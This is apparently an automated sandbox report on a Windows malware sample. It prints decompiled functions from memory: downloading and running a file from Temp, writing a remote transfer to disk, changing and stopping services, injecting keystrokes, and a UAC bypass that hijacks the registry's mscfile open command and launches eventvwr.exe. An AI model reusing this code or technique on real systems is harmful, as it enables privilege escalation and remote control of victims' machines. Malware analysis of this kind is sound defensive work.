Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 179708a092ffb40a923111a1629480cb997eeb7f8006ad3d60df0ad76d29d62c
Instruction ID: 74af67b8f43f0a7cf1836aa350a0e42219eb4718a0c457580b2d45a3ee411ec0
Opcode Fuzzy Hash: 179708a092ffb40a923111a1629480cb997eeb7f8006ad3d60df0ad76d29d62c
Instruction Fuzzy Hash: 92518431B04300DBC714BB74D85E76E3AA5ABC6310F808569F4429B6E3EF2D9949C796

Uniqueness

Uniqueness Score: -1.00%

Function 00753D1B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00753D1B(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00742084(_t60,  &_v136, "\\");
				_t86 = E007475C2(_t60,  &_v112, E0077988A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				E00742F93(_t60,  &_v28, _t35, _t93,  &_a4);
				E00741FC7();
				_t68 =  &_v136;
				E00741FC7();
				_push(_t68);
				_push(_t68);
				_t41 = E00753F58(E0074D544( &_v316, _t35, _t93, E00741F95( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00742084(_t60, _t90 - 0x18, 0x79f6bc);
					_push(0x6f);
					_t73 = 0x7ac800;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00753F68( &_v316,  &_a28, _t94);
					E0074D4F5( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00741F95( &_v28);
					asm("movaps xmm0, [0x7a6090]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00742084(_t60, _t90, 0x79f6bc);
						_push(0x70);
						E00744AA4(_t60, 0x7ac800,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00741F95( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00742084(_t60, _t90 - 0x18, 0x79f6bc);
						_push(0x6e);
						_t73 = 0x7ac800;
						L6:
						E00744AA4(_t60, _t73, _t86, _t97);
					}
				}
				E0074CC42( &_v316, 0x79f6bc);
				E00741FC7();
				E00741FC7();
				return E00741FC7();
			}

0x00753d1b
0x00753d36
0x00753d52
0x00753d57
0x00753d60
0x00753d65
0x00753d6b
0x00753d70
0x00753d71
0x00753d8e
0x00753d93
0x00753d95
0x00753e56
0x00753e5b
0x00753e5d
0x00000000
0x00753d9b
0x00753d9b
0x00753da4
0x00753daf
0x00753db4
0x00753dbb
0x00753dbf
0x00753dc6
0x00753dcd
0x00753dd2
0x00753dd9
0x00753de0
0x00753df6
0x00753df9
0x00753dfd
0x00753e05
0x00753e0a
0x00753e0e
0x00753e18
0x00753e21
0x00753e30
0x00753e30
0x00753e36
0x00753e39
0x00753e41
0x00753e46
0x00753e48
0x00753e62
0x00753e62
0x00753e62
0x00753e39
0x00753e6d
0x00753e75
0x00753e7d
0x00753e90

APIs

Part of subcall function 00753F68: __EH_prolog.LIBCMT ref: 00753F6D

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0079F6BC), ref: 00753E18
CloseHandle.KERNEL32(00000000), ref: 00753E21
DeleteFileA.KERNEL32(00000000), ref: 00753E30
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00753DE4

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Strings

@, xrefs: 00753DC6
Temp, xrefs: 00753D3C
<, xrefs: 00753DBF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 5048dd0c6f2ae53ce792c809fc864ebdacd48f7651781ea876ec1cd0022995cf
Instruction ID: 498a1294c1981f3d40dde618105900e8c102e60c23082ad5fb05fa6ffe47b072
Opcode Fuzzy Hash: 5048dd0c6f2ae53ce792c809fc864ebdacd48f7651781ea876ec1cd0022995cf
Instruction Fuzzy Hash: 5C414D31900209DBDB14FB64DC5AAFDB775AF51305F904269F506AA0E2EF7C1B8ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 007462D8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E007462D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E00790D30();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0074331A(0,  &_v48, __eflags, E00747514( &_v72,  &_a12, __eflags, L".part"));
				E00741EF0();
				_t37 = CreateFileW(E00741EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = E00741EEB( &_a12);
					MoveFileW(E00741EEB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00744B5A( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E007420AB(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00744AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(E00741EEB( &_v48));
						}
					}
				}
				L9:
				E00741EF0();
				E00741EF0();
				return _t58;
			}

0x007462e0
0x007462e9
0x007462ed
0x007462f0
0x007462f3
0x007462f5
0x00746302
0x0074630f
0x00746317
0x00746331
0x0074633a
0x0074633d
0x00746340
0x007463b2
0x007463b3
0x007463bc
0x007463cb
0x007463d1
0x00746342
0x00746342
0x00746345
0x00000000
0x00746347
0x00746347
0x0074634a
0x00000000
0x0074634c
0x0074634c
0x0074634c
0x0074635b
0x00746360
0x00746362
0x00746363
0x0074636a
0x00746379
0x0074637f
0x0074638a
0x00746394
0x0074639b
0x00000000
0x00000000
0x007463a3
0x007463a6
0x00000000
0x007463af
0x007463af
0x00000000
0x007463af
0x00000000
0x007463a6
0x007463ef
0x007463fe
0x007463fe
0x0074634a
0x00746345
0x007463d3
0x007463d6
0x007463de
0x007463eb

APIs

Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00746331
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00746379
CloseHandle.KERNEL32(00000000), ref: 007463B3
MoveFileW.KERNEL32(00000000,00000000), ref: 007463CB
CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 007463EF
DeleteFileW.KERNEL32(00000000), ref: 007463FE

Strings

.part, xrefs: 007462FA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part
API String ID: 820096542-3499674018
Opcode ID: c1e2a1c1afa8afd9d752dcf81d847d6ea2ab74098824d67471bd3eb6a286eae5
Instruction ID: 76b5b1939515a520eba2c0683dc60ba3cc0a0a45d1d0a5f4adf0b710d2d6c385
Opcode Fuzzy Hash: c1e2a1c1afa8afd9d752dcf81d847d6ea2ab74098824d67471bd3eb6a286eae5
Instruction Fuzzy Hash: 3D314875D40219EBCB00EFA4DC9A9EEB779FF04711F50855AF811A3151DB386E84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00745F77, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00745F77(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;

				_t28 = __ecx;
				if( *0x7aa9d0 != 0) {
					return 1;
				}
				_t8 = E00746115(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E007508E2( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x79f6bc);
					_t10 = E00742489();
					_t11 = E00741F95(0x7ac560);
					_t12 = E00742489();
					_t14 = E00741F95( &_v28);
					E00750C80(E00741F95(0x7ac518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E0074427F(__ebx, _t50 + 0x18 - 0x18, 0x7abb08);
					_push(0x79f724);
					E00750B4C(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
					E0075800F( &_v52, 0x34, "eventvwr.exe");
					_t21 = ShellExecuteW(0, L"open", E00741EEB( &_v52), 0x79f724, 0x79f724, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E00741EF0();
						E00741FC7();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}

0x00745f77
0x00745f85
0x00000000
0x00745f89
0x00745f8f
0x00745f94
0x00745f99
0x00745f9f
0x00745fb2
0x00745fc0
0x00745fc8
0x00745fd1
0x00745fdb
0x00745ff2
0x00745ffa
0x00746006
0x00746015
0x0074601b
0x0074602a
0x00746046
0x0074604c
0x0074604f
0x0074605c
0x00746064
0x0074606b
0x00000000
0x0074606b
0x00746053
0x00746053
0x00746070

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 00746046
ExitProcess.KERNEL32 ref: 00746053

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 00746010
origmsc, xrefs: 00745FE1
open, xrefs: 0074603F
eventvwr.exe, xrefs: 00746020
mscfile\shell\open\command, xrefs: 00745FA5

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-3923289169
Opcode ID: 28b146608226d5f0a5ecb5a388f1739f7d25d5e5a021279ce2510105d27b1991
Instruction ID: b3c58c6b268a0cfc352c3fcc3fd53ac728defd290112b54ce0f8c0497a5391f3
Opcode Fuzzy Hash: 28b146608226d5f0a5ecb5a388f1739f7d25d5e5a021279ce2510105d27b1991
Instruction Fuzzy Hash: 4811E7A1A51204EBDB04B2E49C5FFFF36699B42701F900039F806E61D3EF5C194A82E6

Uniqueness

Uniqueness Score: -1.00%

Function 007565DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E007565DD(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t2 =  &_a4; // 0x755d21
				_t24 = _t2;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00741EEB(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00741EF0();
				return _t21;
			}

0x007565e0
0x007565e6
0x007565e8
0x007565ed
0x007565f5
0x007565f5
0x007565f8
0x00756607
0x0075660b
0x0075661a
0x0075661d
0x0075661f
0x00756633
0x00000000
0x00756621
0x00756621
0x00756624
0x0075662f
0x00000000
0x00756626
0x00756629
0x0075662b
0x00756635
0x00756635
0x00756635
0x00756629
0x00756624
0x00756652
0x00756655
0x00756658
0x0075660d
0x0075660e
0x0075660e
0x0075665d
0x0075666a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00755D21,00000000), ref: 007565ED
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00755D21,00000000), ref: 00756601
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 0075660E
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00755D21,00000000), ref: 00756643
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 00756655
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00755D21,00000000), ref: 00756658

Strings

!]u, xrefs: 007565F5, 0075665A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: !]u
API String ID: 493672254-3920909167
Opcode ID: c1dc0ba29ffd3105280e2474a264316469c7032661000d164712c47f393a524d
Instruction ID: 6fa394190444539991e9959db9c2448913d5399d2ff8f1741cc8ea0b00226658
Opcode Fuzzy Hash: c1dc0ba29ffd3105280e2474a264316469c7032661000d164712c47f393a524d
Instruction Fuzzy Hash: 8A0168312441297AD6209B7C9C4EEBB3B6CDB02372F404306FD25931C0EAAC8E4A81A5

Uniqueness

Uniqueness Score: -1.00%

Function 0075650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075650F(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t1 =  &_a4; // 0x755f36
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, E00741EEB(_t1), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00741EF0();
				return _t16;
			}

0x0075651a
0x0075651e
0x00756526
0x00756529
0x00756538
0x0075653c
0x0075655d
0x00756560
0x00756563
0x0075653e
0x0075653f
0x0075653f
0x00756568
0x00756575

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00755F36,00000000), ref: 0075651E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00755F36,00000000), ref: 00756532
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 0075653F
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00755F36,00000000), ref: 0075654E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 00756560
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755F36,00000000), ref: 00756563

Strings

6_u, xrefs: 00756526, 00756565

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: 6_u
API String ID: 221034970-3270214680
Opcode ID: d9518cc36a666d5d98eeaa7388613eb3a7d6304ed1ac85cf730af24cc84bc8d2
Instruction ID: 9e97a37f4954b20e20e7d7f6b02cb77ac4f89b777ea98ca36ec7fc722e06f62a
Opcode Fuzzy Hash: d9518cc36a666d5d98eeaa7388613eb3a7d6304ed1ac85cf730af24cc84bc8d2
Instruction Fuzzy Hash: F7F0F6755401287BD220FBA89C4AEBF3B6DDB45351F804016FE0993141EF6C8E4686F4

Uniqueness

Uniqueness Score: -1.00%

Function 007563AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007563AD(char _a4) {
				void* _t5;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t5 = OpenSCManagerW(0, 0, 0x10);
				_t1 =  &_a4; // 0x756033
				_t18 = _t5;
				_t17 = OpenServiceW(_t18, E00741EEB(_t1), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00741EF0();
				return _t14;
			}

0x007563b5
0x007563b9
0x007563c1
0x007563c4
0x007563d3
0x007563d7
0x007563f4
0x007563f7
0x007563fa
0x007563d9
0x007563da
0x007563da
0x007563ff
0x0075640a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00756033,00000000), ref: 007563B9
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00756033,00000000), ref: 007563CD
CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563DA
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00756033,00000000), ref: 007563E5
CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563F7
CloseServiceHandle.ADVAPI32(00000000,?,?,00756033,00000000), ref: 007563FA

Strings

3`u, xrefs: 007563C1, 007563FC

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID: 3`u
API String ID: 276877138-2633919695
Opcode ID: 196c83b9ff3525816e6c82d2fdd5df8199d3012ef068222e32f03131ffca747f
Instruction ID: a9212c49d121fb65d9b38f30dc6fb7611d397041d65de4617a334b969edc4626
Opcode Fuzzy Hash: 196c83b9ff3525816e6c82d2fdd5df8199d3012ef068222e32f03131ffca747f
Instruction Fuzzy Hash: 63F0E9351411287FD610AB689CC9DFF3B6DDF413A1B404016FD0583110DF6C8E8795B4

Uniqueness

Uniqueness Score: -1.00%

Function 007845EF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E007845EF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E007801D9(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0076FD1B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00770BA0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00782680(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00770BA0(_t101);
									goto L36;
								}
								_t62 = E00782680(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00770BA0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0077F98C(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00790810();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00782680(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0077F98C(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00790810();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x007845f4
0x007845f5
0x007845f6
0x007845fd
0x00784601
0x00784602
0x00784608
0x0078460e
0x00784614
0x00784617
0x00784617
0x0078461a
0x0078461c
0x0078461c
0x0078461a
0x0078461e
0x00784623
0x0078462a
0x0078462d
0x0078462d
0x00784649
0x0078464f
0x00784654
0x007847e7
0x007847fa
0x0078465a
0x0078465a
0x0078465d
0x00784662
0x00784666
0x007846ba
0x007846ba
0x007846bc
0x007846be
0x007847dc
0x007847dc
0x007847de
0x007847df
0x00000000
0x007847e5
0x007846cf
0x007846d5
0x007846d7
0x00000000
0x00000000
0x007846dd
0x007846ef
0x007846f4
0x007846f8
0x00000000
0x00000000
0x00784705
0x0078473f
0x00784742
0x00784745
0x00784747
0x00784749
0x0078474b
0x00784797
0x00784797
0x00784799
0x00784799
0x0078479b
0x007847d5
0x007847d6
0x00000000
0x007847db
0x007847af
0x007847b4
0x007847b6
0x00000000
0x00000000
0x007847ba
0x007847bb
0x007847bc
0x007847bf
0x007847fb
0x007847fe
0x007847c1
0x007847c1
0x007847c2
0x007847c2
0x007847cf
0x007847d1
0x007847d3
0x00784804
0x00000000
0x00000000
0x00000000
0x00000000
0x007847d3
0x0078474d
0x00784750
0x00784752
0x00784754
0x00784756
0x00784759
0x0078475e
0x00784779
0x0078477b
0x00784785
0x00784787
0x00784788
0x0078478a
0x00000000
0x00000000
0x0078478c
0x00784792
0x00784792
0x00000000
0x00784792
0x00784760
0x00784762
0x00784766
0x0078476b
0x0078476d
0x0078476f
0x00000000
0x00000000
0x00784771
0x00000000
0x00784771
0x00784707
0x0078470c
0x00000000
0x00000000
0x00784712
0x00784714
0x00000000
0x00000000
0x0078472b
0x00784730
0x00784734
0x00000000
0x00000000
0x00000000
0x0078473a
0x0078466d
0x0078466f
0x00784671
0x00784679
0x00784698
0x0078469a
0x007846a4
0x007846a6
0x007846a7
0x007846a9
0x00000000
0x00000000
0x007846af
0x007846b5
0x007846b5
0x00000000
0x007846b5
0x0078467d
0x00784681
0x00784686
0x0078468a
0x00000000
0x00000000
0x00784690
0x00000000
0x00784690

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00768E1A,?,?,?,00784840,00000001,00000001,?), ref: 00784649
__alloca_probe_16.LIBCMT ref: 00784681
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00768E1A,?,?,?,00784840,00000001,00000001,?), ref: 007846CF
__alloca_probe_16.LIBCMT ref: 00784766
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007847C9
__freea.LIBCMT ref: 007847D6

Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE

__freea.LIBCMT ref: 007847DF
__freea.LIBCMT ref: 00784804

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: 1597abf3bcb571a56daadee3139adc3674011096d7fe852476502560b0a6e9ba
Instruction ID: bb3ed9897c4fce1df1e0da777b0a577668c0eae14c0d7772cc361a108574ffe6
Opcode Fuzzy Hash: 1597abf3bcb571a56daadee3139adc3674011096d7fe852476502560b0a6e9ba
Instruction Fuzzy Hash: DC51E072660217AFEF25AF60CC89FAB77A9EB41760F154629FC04D6140EBBCDC5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00755288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 007552BC
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 007552DA
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 007552F7
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00755309
SendInput.USER32(00000001,00000001,0000001C), ref: 00755320
SendInput.USER32(00000001,00000001,0000001C), ref: 0075533D
SendInput.USER32(00000001,00000001,0000001C), ref: 00755359
SendInput.USER32(00000001,?,0000001C,?), ref: 00755376

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

